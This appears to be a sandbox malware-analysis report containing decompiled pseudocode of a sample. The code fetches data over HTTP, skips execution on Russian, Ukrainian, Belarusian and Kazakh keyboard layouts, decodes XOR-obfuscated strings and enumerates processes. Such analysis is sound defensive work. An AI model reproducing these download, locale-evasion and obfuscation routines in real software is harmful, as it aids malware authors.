										_t336 = ( *(_t440 + 0x34) - _v332) * 8 -  *(_t440 + 0x34) - _v332;
										_t251 = E0040ED8D(_t336, _t430, _t440, _t487, _t336);
										_t459 = _t458 + 4;
										_t371 =  *(_t440 + 0x34) - _v332;
										_v292 = 0;
										_push(0);
										_v300 = 0;
										_t431 =  *_v320;
										_push( &_v292);
										_v328 = _t251;
										_push( &_v300);
										_t403 = _v320;
										_push(_t371);
										_push(_t251);
										_push(_t336);
										_t337 = _v332;
										_push( *((intOrPtr*)(_t440 + 0x28)) + _t337);
										_push(_t371);
										_push(0);
										_push(_v320);
										if( *((intOrPtr*)( *_v320 + 0x10))() >= 0) {
											_t258 = _v292;
											_t414 =  *(_t440 + 0x30);
											_t373 =  &(_t337[_v292]);
											_t489 = _t414 - _t373;
											if(_t414 > _t373) {
												_t432 =  *((intOrPtr*)(_t440 + 0x28));
											} else {
												 *(_t440 + 0x30) =  &(_t373[0x3e8]);
												_t432 = E0040ED8D(_t337, _t431, _t440, _t489,  &(_t373[0x3e8]));
												E00401770(_t432,  *(_t440 + 0x30),  *((intOrPtr*)(_t440 + 0x28)), _t337);
												L0040EB4D( *((intOrPtr*)(_t440 + 0x28)));
												_t414 =  *(_t440 + 0x30);
												_t459 = _t459 + 0x10;
												_t258 = _v292;
												 *((intOrPtr*)(_t440 + 0x28)) = _t432;
											}
											_t403 = _t414 - _t337;
											E00401770(_t432 + _t337, _t414 - _t337, _v328, _t258);
											_t459 = _t459 + 8;
											 *(_t440 + 0x34) =  &(_t337[_v292]);
										}
										L0040EB4D(_v328);
										_t256 = _v320;
										 *((intOrPtr*)( *_t256 + 8))(_t256);
									}
								}
								_t247 = _v324;
								 *((intOrPtr*)( *_t247 + 8))(_t247);
								goto L32;
							} else {
								_t376 = _v356;
								_t403 = _t403 + 1;
								_t266 = _t376;
								if(_t403 < 0x1000) {
									L22:
									_push(_t403);
									E0040ED7F(_t376);
									_t458 = _t458 + 8;
									goto L23;
								} else {
									_t376 =  *(_t376 - 4);
									_t403 = _t403 + 0x23;
									if(_t266 - _t376 + 0xfffffffc > 0x1f) {
										goto L33;
									} else {
										goto L22;
									}
								}
							}
						} else {
							_t400 = _v380;
							_t423 = 2 + _t410 * 2;
							_t322 = _t400;
							if(_t423 < 0x1000) {
								L18:
								_push(_t423);
								E0040ED7F(_t400);
								_t458 = _t458 + 8;
								goto L19;
							} else {
								_t376 =  *(_t400 - 4);
								_t403 = _t423 + 0x23;
								if(_t322 - _t376 + 0xfffffffc > 0x1f) {
									L33:
									E004134A7(_t334, _t403, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t451);
									_t452 = _t458;
									_push(0xffffffff);
									_push(0x42c295);
									_push( *[fs:0x0]);
									_t461 = _t458 - 0x48;
									_t273 =  *0x43d054 ^ _t452;
									__eflags = _t273;
									_v516 = _t273;
									_push(_t334);
									_push(_t440);
									_push(_t430);
									_push(_t273);
									 *[fs:0x0] =  &_v508;
									_v572 = _t376;
									_t416 = _v488;
									_t377 = _t416;
									_v540 = 0;
									_v544 = _t416;
									_v524 = 0;
									_v520 = 0xf;
									_t442 = _t377 + 1;
									_v540 = 0;
									do {
										_t275 =  *_t377;
										_t377 = _t377 + 1;
										__eflags = _t275;
									} while (_t275 != 0);
									E004026C0(_t334,  &_v52, _t416, _t377 - _t442);
									_v12 = 0;
									_t338 = _v32;
									__eflags = _t338 - 0x10;
									_t443 = _v36;
									_t417 = _t443;
									_t381 =  >=  ? _v52 :  &_v52;
									_t433 = E004028A0( >=  ? _v52 :  &_v52, _t443,  >=  ? _v52 :  &_v52, "http://", 7);
									_t462 = _t461 + 0xc;
									__eflags = _t433 - 0xffffffff;
									if(_t433 == 0xffffffff) {
										L39:
										__eflags = _v32 - 0x10;
										_t340 =  >=  ? _v52 :  &_v52;
										__eflags = _t443;
										if(_t443 == 0) {
											L42:
											_t434 = _t433 | 0xffffffff;
											__eflags = _t434;
										} else {
											_t433 = E004109D0(_t340, 0x2f, _t443);
											_t462 = _t462 + 0xc;
											__eflags = _t433;
											if(_t433 == 0) {
												goto L42;
											} else {
												_t434 = _t433 - _t340;
											}
										}
										__eflags = _t443 - _t434;
										_v80 = 0;
										_v64 = 0;
										_t383 =  <  ? _t443 : _t434;
										_v60 = 0xf;
										__eflags = _v32 - 0x10;
										_t279 =  >=  ? _v52 :  &_v52;
										_v80 = 0;
										E004026C0(_t340,  &_v80,  >=  ? _v52 :  &_v52,  <  ? _t443 : _t434);
										_v12 = 1;
										_t281 = _v36;
										__eflags = _t281 - _t434;
										_t435 =  <  ? _t281 : _t434;
										__eflags = _v32 - 0x10;
										_t386 =  >=  ? _v52 :  &_v52;
										_t282 = _t281 - ( <  ? _t281 : _t434);
										_v36 = _t281 - ( <  ? _t281 : _t434);
										E00410440( >=  ? _v52 :  &_v52,  &(( >=  ? _v52 :  &_v52)[ <  ? _t281 : _t434]), _t281 - ( <  ? _t281 : _t434) + 1);
										_t341 = _v84;
										_v88 = 0;
										E00413584(_t341 + 0x44, 0x104, _v56, 0x103);
										_t462 = _t462 + 0x1c;
										asm("sbb eax, eax");
										_t443 = InternetOpenA( *(_t341 + 0xc),  ~( *(_t341 + 0x38)) & 0x00000003,  *(_t341 + 0x38), 0, 0);
										_v92 = _t443;
										__eflags = _t443;
										if(_t443 != 0) {
											_v56 = 1;
											InternetSetOptionA(_t443, 0x41,  &_v56, 4);
											__eflags = _v60 - 0x10;
											_t307 =  >=  ? _v80 :  &_v80;
											_t308 = InternetConnectA(_t443,  >=  ? _v80 :  &_v80, 0x50,  *(_t341 + 0x3c),  *(_t341 + 0x40), 3, 0, 1);
											_t437 = InternetCloseHandle;
											_t344 = _t308;
											__eflags = _t344;
											if(_t344 != 0) {
												__eflags = _v32 - 0x10;
												_t395 =  >=  ? _v52 :  &_v52;
												_t447 = HttpOpenRequestA(_t344, "GET",  >=  ? _v52 :  &_v52, 0, 0, 0, 0x80400000, 1);
												__eflags = _t447;
												if(__eflags != 0) {
													E00401A00(_t344, InternetCloseHandle, __eflags, _t447);
													_t313 = HttpSendRequestA(_t447, 0, 0, 0, 0);
													__eflags = _t313;
													if(_t313 != 0) {
														_v88 = E00401B40(_t344, _v84, InternetCloseHandle, _t447);
													}
													 *_t437(_t447);
												}
												 *_t437(_t344);
												_t443 = _v92;
											}
											 *_t437(_t443);
										}
										_t418 = _v60;
										__eflags = _v88;
										_t338 = 0 | _v88 > 0x00000000;
										__eflags = _t418 - 0x10;
										if(_t418 < 0x10) {
											L55:
											_t419 = _v32;
											_v64 = 0;
											_v60 = 0xf;
											_v80 = 0;
											__eflags = _t419 - 0x10;
											if(_t419 < 0x10) {
												L59:
												 *[fs:0x0] = _v20;
												_pop(_t436);
												_pop(_t444);
												_pop(_t343);
												__eflags = _v28 ^ _t452;
												return E0040EB3F(_t338, _t343, _v28 ^ _t452, _t419, _t436, _t444);
											} else {
												_t391 = _v52;
												_t419 = _t419 + 1;
												_t294 = _t391;
												__eflags = _t419 - 0x1000;
												if(_t419 < 0x1000) {
													L58:
													_push(_t419);
													E0040ED7F(_t391);
													goto L59;
												} else {
													_t391 =  *((intOrPtr*)(_t391 - 4));
													_t419 = _t419 + 0x23;
													__eflags = _t294 - _t391 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														goto L61;
													} else {
														goto L58;
													}
												}
											}
										} else {
											_t393 = _v80;
											_t420 = _t418 + 1;
											_t300 = _t393;
											__eflags = _t420 - 0x1000;
											if(_t420 < 0x1000) {
												L54:
												_push(_t420);
												E0040ED7F(_t393);
												_t462 = _t462 + 8;
												goto L55;
											} else {
												_t391 =  *((intOrPtr*)(_t393 - 4));
												_t419 = _t420 + 0x23;
												__eflags = _t300 - _t391 + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L61;
												} else {
													goto L54;
												}
											}
										}
									} else {
										__eflags = _t443 - _t433;
										if(_t443 < _t433) {
											E00402800(_t381, _t417);
											L61:
											E004134A7(_t338, _t419, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t452);
											_push(_t443);
											_t445 = _t391;
											_t299 =  *(_t445 + 0x2c);
											 *(_t445 + 0x34) = 0;
											__eflags = _t299;
											if(_t299 != 0) {
												_t299 = L0040EB4D(_t299);
												 *(_t445 + 0x2c) = 0;
											}
											_push(_v4);
											L34();
											return _t299;
										} else {
											_t319 = _t443 - _t433;
											__eflags = _t319 - 7;
											_t422 =  <  ? _t319 : 7;
											__eflags = _t338 - 0x10;
											_t398 =  >=  ? _v52 :  &_v52;
											_t448 = _t443 - 7;
											_t399 =  &(( >=  ? _v52 :  &_v52)[_t433]);
											_v36 = _t448;
											__eflags = _t448 - _t433 + 1;
											E00410440( &(( >=  ? _v52 :  &_v52)[_t433]),  &(( &(( >=  ? _v52 :  &_v52)[_t433]))[ <  ? _t319 : 7]), _t448 - _t433 + 1);
											_t443 = _v36;
											_t462 = _t462 + 0xc;
											goto L39;
										}
									}
								} else {
									goto L18;
								}
							}
						}
					}
				}
			}

0x00401b43
0x00401b45
0x00401b50
0x00401b51
0x00401b57
0x00401b5c
0x00401b5e
0x00401b61
0x00401b63
0x00401b64
0x00401b68
0x00401b6e
0x00401b70
0x00401b74
0x00401b77
0x00401b7d
0x00401bac
0x00401b7f
0x00401b84
0x00401b8b
0x00401b90
0x00401b93
0x00401b96
0x00401b9d
0x00401b9d
0x00401bbb
0x00401bc5
0x00401bd0
0x00401be4
0x00401bea
0x00401bf0
0x00401bf2
0x00401bf7
0x00401bfd
0x00401c03
0x00401c0b
0x00401c16
0x00401c1e
0x00401c26
0x00401c2b
0x00401c31
0x00401c34
0x00401c37
0x00401c37
0x00401c3d
0x00401c50
0x00401c5d
0x00401c62
0x00401c80
0x00401fe5
0x00401feb
0x00401ffb
0x00402003
0x00402004
0x00402005
0x00402013
0x00401c86
0x00401c8c
0x00401ca0
0x00401ca6
0x00401cb1
0x00401cb9
0x00000000
0x00401ccc
0x00401ccc
0x00401cd2
0x00401cdc
0x00401ce6
0x00401ce9
0x00401cf3
0x00401cfa
0x00401d00
0x00401d00
0x00401d02
0x00401d03
0x00401d17
0x00401d1c
0x00401d2f
0x00401d35
0x00401d3f
0x00401d4e
0x00401d58
0x00401d69
0x00401d6e
0x00401d71
0x00401d84
0x00401d8c
0x00401d9a
0x00401d9c
0x00401d9e
0x00401daa
0x00401db4
0x00401dbe
0x00401dc5
0x00401dc5
0x00401dd0
0x00401dd0
0x00401dd3
0x00401dd6
0x00401de7
0x00401ded
0x00401df2
0x00401df5
0x00401dff
0x00401e13
0x00401e23
0x00401e26
0x00401e2a
0x00401e2c
0x00401e35
0x00401e6c
0x00401e6e
0x00401e75
0x00401e7b
0x00401e85
0x00401e8f
0x00401e99
0x00401eca
0x00401ecc
0x00401ed2
0x00401ed9
0x00401eef
0x00401ef2
0x00401efd
0x00401f03
0x00401f09
0x00401f13
0x00401f15
0x00401f1f
0x00401f27
0x00401f2e
0x00401f34
0x00401f35
0x00401f3b
0x00401f3c
0x00401f40
0x00401f41
0x00401f49
0x00401f4a
0x00401f4b
0x00401f4d
0x00401f53
0x00401f55
0x00401f5b
0x00401f5e
0x00401f61
0x00401f63
0x00401f9d
0x00401f65
0x00401f6c
0x00401f77
0x00401f7f
0x00401f87
0x00401f8c
0x00401f8f
0x00401f92
0x00401f98
0x00401f98
0x00401fa7
0x00401fac
0x00401fb7
0x00401fbc
0x00401fbc
0x00401fc5
0x00401fca
0x00401fd6
0x00401fd6
0x00401ed9
0x00401fd9
0x00401fe2
0x00000000
0x00401e9b
0x00401e9b
0x00401ea1
0x00401ea2
0x00401eaa
0x00401ec0
0x00401ec0
0x00401ec2
0x00401ec7
0x00000000
0x00401eac
0x00401eac
0x00401eaf
0x00401eba
0x00000000
0x00000000
0x00000000
0x00000000
0x00401eba
0x00401eaa
0x00401e37
0x00401e37
0x00401e3d
0x00401e44
0x00401e4c
0x00401e62
0x00401e62
0x00401e64
0x00401e69
0x00000000
0x00401e4e
0x00401e4e
0x00401e51
0x00401e5c
0x00402016
0x00402016
0x0040201b
0x0040201c
0x0040201d
0x0040201e
0x0040201f
0x00402020
0x00402021
0x00402023
0x00402025
0x00402030
0x00402031
0x00402039
0x00402039
0x0040203b
0x0040203e
0x0040203f
0x00402040
0x00402041
0x00402045
0x0040204b
0x0040204e
0x00402051
0x00402053
0x0040205a
0x0040205d
0x00402064
0x0040206b
0x0040206e
0x00402072
0x00402072
0x00402074
0x00402075
0x00402075
0x00402080
0x00402085
0x0040208f
0x00402092
0x00402095
0x00402098
0x0040209a
0x004020ab
0x004020ad
0x004020b0
0x004020b3
0x004020f0
0x004020f0
0x004020f7
0x004020fb
0x004020fd
0x00402115
0x00402115
0x00402115
0x004020ff
0x00402108
0x0040210a
0x0040210d
0x0040210f
0x00000000
0x00402111
0x00402111
0x00402111
0x0040210f
0x00402118
0x0040211a
0x00402123
0x0040212a
0x0040212d
0x00402134
0x0040213c
0x00402144
0x00402148
0x0040214d
0x00402154
0x00402157
0x00402159
0x0040215c
0x00402160
0x00402164
0x00402166
0x00402170
0x00402175
0x0040217b
0x00402193
0x0040219b
0x004021a5
0x004021b4
0x004021b6
0x004021b9
0x004021bb
0x004021c6
0x004021d1
0x004021d7
0x004021e0
0x004021f2
0x004021f8
0x004021fe
0x00402200
0x00402202
0x00402204
0x0040220d
0x00402229
0x0040222b
0x0040222d
0x00402230
0x0040223e
0x00402244
0x00402246
0x00402251
0x00402251
0x00402255
0x00402255
0x00402258
0x0040225a
0x0040225a
0x0040225e
0x0040225e
0x00402260
0x00402265
0x00402268
0x0040226b
0x0040226e
0x00402298
0x00402298
0x0040229b
0x004022a2
0x004022a9
0x004022ad
0x004022b0
0x004022da
0x004022df
0x004022e7
0x004022e8
0x004022e9
0x004022ed
0x004022f7
0x004022b2
0x004022b2
0x004022b5
0x004022b6
0x004022b8
0x004022be
0x004022d0
0x004022d0
0x004022d2
0x00000000
0x004022c0
0x004022c0
0x004022c3
0x004022cb
0x004022ce
0x00000000
0x00000000
0x00000000
0x00000000
0x004022ce
0x004022be
0x00402270
0x00402270
0x00402273
0x00402274
0x00402276
0x0040227c
0x0040228e
0x0040228e
0x00402290
0x00402295
0x00000000
0x0040227e
0x0040227e
0x00402281
0x00402289
0x0040228c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040228c
0x0040227c
0x004020b5
0x004020b5
0x004020b7
0x004022fa
0x004022ff
0x004022ff
0x00402304
0x00402305
0x00402306
0x00402307
0x00402308
0x00402309
0x0040230a
0x0040230b
0x0040230c
0x0040230d
0x0040230e
0x0040230f
0x00402310
0x00402313
0x00402314
0x00402316
0x00402319
0x00402320
0x00402322
0x00402325
0x0040232d
0x0040232d
0x00402334
0x00402339
0x00402340
0x004020bd
0x004020c2
0x004020c9
0x004020cb
0x004020ce
0x004020d1
0x004020d5
0x004020d7
0x004020d9
0x004020de
0x004020e5
0x004020ea
0x004020ed
0x00000000
0x004020ed
0x004020b7
0x00000000
0x00000000
0x00000000
0x00401e5c
0x00401e4c
0x00401e35
0x00401cb9

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401BC5
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401BE4

Strings

text, xrefs: 00401E1C

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID: text
API String ID: 3197321146-999008199
Opcode ID: 1186a57e0e310aca16fe47c36d5f4b6cffc31baa6d91a97c410239c9c70368c2
Instruction ID: 25b526b37aec09b3ef7a4049139250d4f2bd2158be93f4c38c49d480371632c1
Opcode Fuzzy Hash: 1186a57e0e310aca16fe47c36d5f4b6cffc31baa6d91a97c410239c9c70368c2
Instruction Fuzzy Hash: 0BC16B70A002189FDB25CF25CD85BEAB7B9FF48304F1045E9E40AA7291DB75AE85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00404D40 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 368
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00404D40(void* __ebx, int* __ecx) {
				intOrPtr _v8;
				int _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				char _v80;
				char _v81;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				long _v100;
				int _v104;
				int _v120;
				char _v284;
				char _v288;
				char _v292;
				char _v540;
				struct HKL__* _v1564;
				int* _v1568;
				int _v1572;
				int _v1576;
				int _v1580;
				long _v1584;
				int _v1588;
				int _v1604;
				int* _v1608;
				intOrPtr _v1628;
				char _v1636;
				signed int _v1640;
				intOrPtr _v1652;
				intOrPtr _v1656;
				signed int _v1660;
				intOrPtr _v1696;
				intOrPtr _v1700;
				signed int _v1752;
				char _v2002;
				short _v2004;
				int* _v2020;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t130;
				signed int _t131;
				int _t134;
				int _t137;
				intOrPtr* _t139;
				intOrPtr _t143;
				int _t145;
				signed int _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t164;
				signed int _t170;
				short _t172;
				signed int _t177;
				signed int _t183;
				intOrPtr _t188;
				signed char _t189;
				signed char* _t190;
				void* _t195;
				long _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t204;
				int _t208;
				void* _t212;
				signed int _t213;
				void* _t220;
				signed int _t222;
				int _t223;
				void* _t224;
				intOrPtr _t232;
				int _t234;
				int _t237;
				signed int* _t238;
				signed int _t248;
				intOrPtr* _t249;
				signed int _t255;
				long _t259;
				void* _t260;
				void* _t264;
				signed char* _t265;
				signed int _t267;
				void* _t268;
				signed int _t269;
				void* _t270;
				int* _t271;
				void* _t272;
				int* _t274;
				void* _t275;
				void* _t276;
				signed int _t277;
				void* _t279;
				void* _t280;
				intOrPtr _t281;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				void* _t290;
				signed int _t293;
				signed int _t294;
				void* _t297;
				signed int _t299;

				_push(__ebx);
				_t220 = _t290;
				_t293 = (_t290 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t220 + 4));
				_t284 = _t293;
				_push(0xffffffff);
				_push(0x42c4f2);
				_push( *[fs:0x0]);
				_push(_t220);
				_t294 = _t293 - 0x630;
				_t130 =  *0x43d054; // 0x8e1b5714
				_t131 = _t130 ^ _t284;
				_v32 = _t131;
				_push(_t131);
				 *[fs:0x0] =  &_v24;
				_t274 = __ecx;
				_v1568 = __ecx;
				_v1608 = __ecx;
				asm("xorps xmm0, xmm0");
				_v1572 = 0;
				asm("movq [esi], xmm0");
				__ecx[2] = 0;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = 0;
				_v16 = 0;
				_v1572 = 1;
				_t134 = GetKeyboardLayoutList(0x400,  &_v1564);
				_t267 = 0;
				_v1568 = _t134;
				if(_t134 <= 0) {
					L12:
					 *[fs:0x0] = _v24;
					_pop(_t268);
					_pop(_t275);
					return E0040EB3F(_t274, _t220, _v32 ^ _t284, _t259, _t268, _t275);
				} else {
					do {
						_t137 =  *(_t284 + _t267 * 4 - 0x610) & 0x0000ffff;
						_v1576 = _t137;
						GetLocaleInfoA(_t137, 2,  &_v540, 0x1f4); // executed
						_t139 =  &_v540;
						_v1604 = 0;
						_v1588 = 0;
						_t260 = _t139 + 1;
						_v1584 = 0xf;
						_v1604 = 0;
						do {
							_t232 =  *_t139;
							_t139 = _t139 + 1;
						} while (_t232 != 0);
						E004026C0(_t220,  &_v1604,  &_v540, _t139 - _t260);
						_t234 = _v1576;
						_v1580 = _t234;
						_v16 = 1;
						_t143 =  *((intOrPtr*)(_t274 + 4));
						if(_t143 ==  *((intOrPtr*)(_t274 + 8))) {
							_push( &_v1604);
							_push(_t143);
							E0040CBC0(_t220, _t274, _t267, _t274);
							_t259 = _v1584;
						} else {
							asm("movups xmm0, [ebp-0x638]");
							_t259 = 0xf;
							_v1604 = 0;
							asm("movups [eax], xmm0");
							asm("movq xmm0, [ebp-0x628]");
							asm("movq [eax+0x10], xmm0");
							 *(_t143 + 0x18) = _t234;
							 *((intOrPtr*)(_t274 + 4)) =  *((intOrPtr*)(_t274 + 4)) + 0x1c;
						}
						_v16 = 0;
						if(_t259 < 0x10) {
							goto L11;
						} else {
							_t237 = _v1604;
							_t259 = _t259 + 1;
							_t145 = _t237;
							if(_t259 < 0x1000) {
								L10:
								_push(_t259);
								E0040ED7F(_t237);
								_t294 = _t294 + 8;
								goto L11;
							} else {
								_t237 =  *(_t237 - 4);
								_t259 = _t259 + 0x23;
								if(_t145 - _t237 + 0xfffffffc > 0x1f) {
									E004134A7(_t220, _t259, __eflags);
									asm("int3");
									_push(_t284);
									_t286 = _t294;
									_push(0xffffffff);
									_push(0x42c535);
									_push( *[fs:0x0]);
									_t297 = _t294 - 0x5c;
									_t151 =  *0x43d054; // 0x8e1b5714
									_t152 = _t151 ^ _t286;
									_v1640 = _t152;
									_push(_t220);
									_push(_t274);
									_push(_t267);
									_push(_t152);
									 *[fs:0x0] =  &_v1636;
									_t222 = 0;
									_t238 =  &_v1660;
									asm("xorps xmm0, xmm0");
									_v1696 = 0;
									asm("movq [ebp-0x24], xmm0");
									_v1652 = 0;
									E00404D40(0, _t238); // executed
									_v1628 = 0;
									_t155 = _v1656;
									_t269 = _v1660;
									_v1700 = _t155;
									__eflags = _t269 - _t155;
									if(_t269 == _t155) {
										L41:
										_t223 = 0;
										__eflags = 0;
										goto L42;
									} else {
										_v40 = 0x5d5d5b7c;
										_v36 = 0x2e404f47;
										_t281 =  *((intOrPtr*)( *[fs:0x2c]));
										_v96 = _t281;
										do {
											E0040BB10(_t222,  &_v80, _t259, _t269, _t269);
											_v56 =  *((intOrPtr*)(_t269 + 0x18));
											_v20 = 1;
											_t188 =  *0x450fe0; // 0x8000000f
											__eflags = _t188 -  *((intOrPtr*)(_t281 + 4));
											if(_t188 >  *((intOrPtr*)(_t281 + 4))) {
												E0040EEC8(_t188, 0x450fe0);
												_t297 = _t297 + 4;
												__eflags =  *0x450fe0 - 0xffffffff;
												if(__eflags == 0) {
													_t62 =  &_v40; // 0x5d5d5b7c
													 *0x450d20 =  *_t62;
													_t63 =  &_v36; // 0x2e404f47
													 *0x450d24 =  *_t63;
													E0040F1DA( &_v80, __eflags, 0x42ce60);
													E0040EE7E(0x450fe0);
													_t297 = _t297 + 8;
												}
											}
											_t189 =  *0x450d27; // 0x0
											__eflags = _t189;
											if(_t189 != 0) {
												 *0x450d20 =  *0x450d20 ^ 0x0000002e;
												 *0x450d21 =  *0x450d21 ^ 0x0000002e;
												 *0x450d22 =  *0x450d22 ^ 0x0000002e;
												 *0x450d23 =  *0x450d23 ^ 0x0000002e;
												 *0x450d24 =  *0x450d24 ^ 0x0000002e;
												 *0x450d25 =  *0x450d25 ^ 0x0000002e;
												 *0x450d26 =  *0x450d26 ^ 0x0000002e;
												_t213 = _t189 ^ 0x0000002e;
												__eflags = _t213;
												 *0x450d27 = _t213;
											}
											_t190 = 0x450d20;
											_v120 = 0;
											_v104 = 0;
											_v100 = 0xf;
											_t67 =  &(_t190[1]); // 0x450d21
											_t265 = _t67;
											do {
												_t255 =  *_t190;
												_t190 =  &(_t190[1]);
												__eflags = _t255;
											} while (_t255 != 0);
											E004026C0(_t222,  &_v120, 0x450d20, _t190 - _t265);
											_t274 = _v80;
											_t259 = _v64;
											__eflags = _v100 - 0x10;
											_v88 = _t222 | 0x00000001;
											_t223 = _v120;
											_t194 =  >=  ? _t223 :  &_v120;
											__eflags = _v60 - 0x10;
											_t238 =  >=  ? _t274 :  &_v80;
											_t195 = E004028A0(_t238, _t259, _t238,  >=  ? _t223 :  &_v120, _v104);
											_t297 = _t297 + 0xc;
											__eflags = _t195 - 0xffffffff;
											if(_t195 != 0xffffffff) {
												L25:
												_v81 = 1;
											} else {
												__eflags = _v60 - 0x10;
												_t259 = _v64;
												_t238 =  >=  ? _t274 :  &_v80;
												_t212 = E004028A0(_t238, _t259, _t238, 0x439a6c, 7);
												_t297 = _t297 + 0xc;
												_v81 = 0;
												__eflags = _t212 - 0xffffffff;
												if(_t212 != 0xffffffff) {
													goto L25;
												}
											}
											_v88 = _v88 & 0xfffffffe;
											_t196 = _v100;
											__eflags = _t196 - 0x10;
											if(_t196 < 0x10) {
												L30:
												__eflags = _v81;
												if(_v81 != 0) {
													L46:
													_t197 = _v60;
													__eflags = _t197 - 0x10;
													if(_t197 < 0x10) {
														L50:
														_t269 = _v52;
														_t223 = 1;
														L42:
														__eflags = _t269;
														if(_t269 == 0) {
															L52:
															 *[fs:0x0] = _v28;
															_pop(_t270);
															_pop(_t276);
															_pop(_t224);
															__eflags = _v32 ^ _t286;
															return E0040EB3F(_t223, _t224, _v32 ^ _t286, _t259, _t270, _t276);
														} else {
															_push(_t238);
															E0040D300(_t269, _v48, _t269, _t274);
															_t277 = _v52;
															_t299 = _t297 + 4;
															_t259 = (0x92492493 * (_v44 - _t277) >> 0x20) + _v44 - _t277 >> 4;
															_t164 = _t277;
															_t248 = ((_t259 >> 0x1f) + _t259) * 8 - (_t259 >> 0x1f) + _t259 << 2;
															__eflags = _t248 - 0x1000;
															if(_t248 < 0x1000) {
																L51:
																_push(_t248);
																E0040ED7F(_t277);
																goto L52;
															} else {
																_t277 =  *((intOrPtr*)(_t277 - 4));
																_t248 = _t248 + 0x23;
																__eflags = _t164 - _t277 + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	E004134A7(_t223, _t259, __eflags);
																	goto L54;
																} else {
																	goto L51;
																}
															}
														}
													} else {
														_t109 = _t197 + 1; // 0x11
														_t238 = _t109;
														_t198 = _t274;
														__eflags = _t238 - 0x1000;
														if(_t238 < 0x1000) {
															L49:
															_push(_t238);
															E0040ED7F(_t274);
															_t297 = _t297 + 8;
															goto L50;
														} else {
															_t277 =  *((intOrPtr*)(_t274 - 4));
															_t248 = _t238 + 0x23;
															__eflags = _t198 - _t277 + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L54;
															} else {
																goto L49;
															}
														}
													}
												} else {
													_t202 = _v56;
													__eflags = _t202 - 0x419;
													if(_t202 == 0x419) {
														goto L46;
													} else {
														__eflags = _t202 - 0x422;
														if(_t202 == 0x422) {
															goto L46;
														} else {
															__eflags = _t202 - 0x423;
															if(_t202 == 0x423) {
																goto L46;
															} else {
																__eflags = _t202 - 0x43f;
																if(_t202 == 0x43f) {
																	goto L46;
																} else {
																	_v20 = 0;
																	_t203 = _v60;
																	__eflags = _t203 - 0x10;
																	if(_t203 < 0x10) {
																		goto L39;
																	} else {
																		_t93 = _t203 + 1; // 0x11
																		_t238 = _t93;
																		_t204 = _t274;
																		__eflags = _t238 - 0x1000;
																		if(_t238 < 0x1000) {
																			L38:
																			_push(_t238);
																			E0040ED7F(_t274);
																			_t297 = _t297 + 8;
																			goto L39;
																		} else {
																			_t277 =  *((intOrPtr*)(_t274 - 4));
																			_t248 = _t238 + 0x23;
																			__eflags = _t204 - _t277 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L54;
																			} else {
																				goto L38;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											} else {
												_t86 = _t196 + 1; // 0x11
												_t238 = _t86;
												_t208 = _t223;
												__eflags = _t238 - 0x1000;
												if(_t238 < 0x1000) {
													L29:
													_push(_t238);
													E0040ED7F(_t223);
													_t274 = _v80;
													_t297 = _t297 + 8;
													goto L30;
												} else {
													_t223 =  *(_t223 - 4);
													_t248 = _t238 + 0x23;
													__eflags = _t208 - _t223 + 0xfffffffc - 0x1f;
													if(__eflags > 0) {
														L54:
														E004134A7(_t223, _t259, __eflags);
														asm("int3");
														asm("int3");
														_push(_t286);
														_t288 = _t299;
														_t170 =  *0x43d054; // 0x8e1b5714
														_v1752 = _t170 ^ _t288;
														_push(_t277);
														_push(_t269);
														_t271 = _t248;
														_v2020 = _t271;
														_v2020 = _t271;
														_t172 =  *0x439a7c; // 0x3e
														asm("movq xmm0, [0x439a74]");
														_v2004 = _t172;
														asm("movq [ebp-0x108], xmm0");
														E00410A80(_t271,  &_v2002, 0, 0xfa);
														_t279 = OpenProcess(0x410, 0, _t259);
														__eflags = _t279;
														if(_t279 != 0) {
															_t183 =  &_v292;
															__imp__K32EnumProcessModules(_t279, _t183, 4,  &_v288); // executed
															__eflags = _t183;
															if(_t183 != 0) {
																__imp__K32GetModuleBaseNameA(_t279, _v292,  &_v284, 0x104); // executed
															}
														}
														FindCloseChangeNotification(_t279); // executed
														_t249 =  &_v284;
														 *_t271 = 0;
														_t271[4] = 0;
														_t264 = _t249 + 1;
														_t271[5] = 0xf;
														 *_t271 = 0;
														do {
															_t177 =  *_t249;
															_t249 = _t249 + 1;
															__eflags = _t177;
														} while (_t177 != 0);
														E004026C0(_t223, _t271,  &_v284, _t249 - _t264);
														_pop(_t272);
														__eflags = _v24 ^ _t288;
														_pop(_t280);
														return E0040EB3F(_t271, _t223, _v24 ^ _t288, _t264, _t272, _t280);
													} else {
														goto L29;
													}
												}
											}
